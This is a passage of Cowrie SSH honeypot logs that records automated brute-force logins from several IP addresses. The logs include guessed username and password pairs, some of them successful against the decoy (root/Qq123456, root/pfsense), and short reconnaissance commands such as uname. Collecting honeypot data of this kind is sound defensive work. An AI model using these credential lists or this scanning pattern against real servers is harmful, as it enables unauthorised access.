{"eventid":"cowrie.login.failed","username":"index","password":"1234","message":"login attempt [index/1234] failed","sensor":"my-vps","timestamp":"2025-08-28T09:02:07.698552Z","src_ip":"185.93.89.7","session":"96c3d92eff02"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:08.733841Z","src_ip":"185.93.89.7","session":"96c3d92eff02"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62686,"dst_ip":"1.2.3.4","dst_port":22,"session":"bed87674916c","protocol":"ssh","message":"New connection: 212.227.235.229:62686 (1.2.3.4:22) [session: bed87674916c]","sensor":"my-vps","timestamp":"2025-08-28T09:02:10.397393Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:10.962966Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:02:10.963904Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":40514,"dst_ip":"1.2.3.4","dst_port":22,"session":"481ac12dc7f2","protocol":"ssh","message":"New connection: 51.79.164.132:40514 (1.2.3.4:22) [session: 481ac12dc7f2]","sensor":"my-vps","timestamp":"2025-08-28T09:02:12.653028Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:12.809772Z","src_ip":"51.79.164.132","session":"481ac12dc7f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:02:13.382109Z","src_ip":"51.79.164.132","session":"481ac12dc7f2"}
{"eventid":"cowrie.login.success","username":"root","password":"09098199","message":"login attempt [root/09098199] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:02:13.433694Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:02:14.598717Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-28T09:02:14.599415Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"appuser","message":"login attempt [appuser/appuser] failed","sensor":"my-vps","timestamp":"2025-08-28T09:02:14.690512Z","src_ip":"51.79.164.132","session":"481ac12dc7f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:15.232512Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:15.631021Z","src_ip":"212.227.235.229","session":"bed87674916c"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:16.221494Z","src_ip":"51.79.164.132","session":"481ac12dc7f2"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":36252,"dst_ip":"1.2.3.4","dst_port":22,"session":"28c43f08cc29","protocol":"ssh","message":"New connection: 185.93.89.7:36252 (1.2.3.4:22) [session: 28c43f08cc29]","sensor":"my-vps","timestamp":"2025-08-28T09:02:31.191456Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:31.216607Z","src_ip":"185.93.89.7","session":"28c43f08cc29"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:02:31.217210Z","src_ip":"185.93.89.7","session":"28c43f08cc29"}
{"eventid":"cowrie.login.failed","username":"index","password":"12345","message":"login attempt [index/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T09:02:31.369413Z","src_ip":"185.93.89.7","session":"28c43f08cc29"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:32.392318Z","src_ip":"185.93.89.7","session":"28c43f08cc29"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43398,"dst_ip":"1.2.3.4","dst_port":22,"session":"88b6d727f9b9","protocol":"ssh","message":"New connection: 212.227.235.229:43398 (1.2.3.4:22) [session: 88b6d727f9b9]","sensor":"my-vps","timestamp":"2025-08-28T09:02:36.748273Z"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":51244,"dst_ip":"1.2.3.4","dst_port":22,"session":"e856ef596ed3","protocol":"ssh","message":"New connection: 51.79.164.132:51244 (1.2.3.4:22) [session: e856ef596ed3]","sensor":"my-vps","timestamp":"2025-08-28T09:02:38.496786Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:39.009749Z","src_ip":"51.79.164.132","session":"e856ef596ed3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:02:39.010684Z","src_ip":"51.79.164.132","session":"e856ef596ed3"}
{"eventid":"cowrie.login.failed","username":"tom","password":"tom","message":"login attempt [tom/tom] failed","sensor":"my-vps","timestamp":"2025-08-28T09:02:40.331033Z","src_ip":"51.79.164.132","session":"e856ef596ed3"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:41.790495Z","src_ip":"51.79.164.132","session":"e856ef596ed3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:42.910326Z","src_ip":"212.227.235.229","session":"88b6d727f9b9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T09:02:43.051538Z","src_ip":"212.227.235.229","session":"88b6d727f9b9"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:47.281698Z","src_ip":"212.227.235.229","session":"88b6d727f9b9"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":51542,"dst_ip":"1.2.3.4","dst_port":22,"session":"563daea4eea1","protocol":"ssh","message":"New connection: 185.93.89.7:51542 (1.2.3.4:22) [session: 563daea4eea1]","sensor":"my-vps","timestamp":"2025-08-28T09:02:55.815888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:55.826293Z","src_ip":"185.93.89.7","session":"563daea4eea1"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:02:55.834133Z","src_ip":"185.93.89.7","session":"563daea4eea1"}
{"eventid":"cowrie.login.failed","username":"index","password":"1234567","message":"login attempt [index/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T09:02:55.893523Z","src_ip":"185.93.89.7","session":"563daea4eea1"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:02:56.967905Z","src_ip":"185.93.89.7","session":"563daea4eea1"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36390,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdc3b6ebe97d","protocol":"ssh","message":"New connection: 51.79.164.132:36390 (1.2.3.4:22) [session: cdc3b6ebe97d]","sensor":"my-vps","timestamp":"2025-08-28T09:03:04.127107Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:04.227614Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:03:04.671765Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.login.success","username":"root","password":"Qq123456","message":"login attempt [root/Qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:03:05.981617Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:03:06.613162Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:03:06.613850Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:07.278273Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:07.279333Z","src_ip":"51.79.164.132","session":"cdc3b6ebe97d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40398,"dst_ip":"1.2.3.4","dst_port":22,"session":"d175e44a8667","protocol":"ssh","message":"New connection: 212.227.235.229:40398 (1.2.3.4:22) [session: d175e44a8667]","sensor":"my-vps","timestamp":"2025-08-28T09:03:09.718484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:09.851156Z","src_ip":"212.227.235.229","session":"d175e44a8667"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:03:09.852431Z","src_ip":"212.227.235.229","session":"d175e44a8667"}
{"eventid":"cowrie.login.success","username":"root","password":"pfsense","message":"login attempt [root/pfsense] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:03:10.448056Z","src_ip":"212.227.235.229","session":"d175e44a8667"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:03:10.676220Z","src_ip":"212.227.235.229","session":"d175e44a8667"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":52066,"dst_ip":"1.2.3.4","dst_port":22,"session":"52d05eb62d2f","protocol":"ssh","message":"New connection: 185.93.89.7:52066 (1.2.3.4:22) [session: 52d05eb62d2f]","sensor":"my-vps","timestamp":"2025-08-28T09:03:20.108250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:03:20.112601Z","src_ip":"185.93.89.7","session":"52d05eb62d2f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh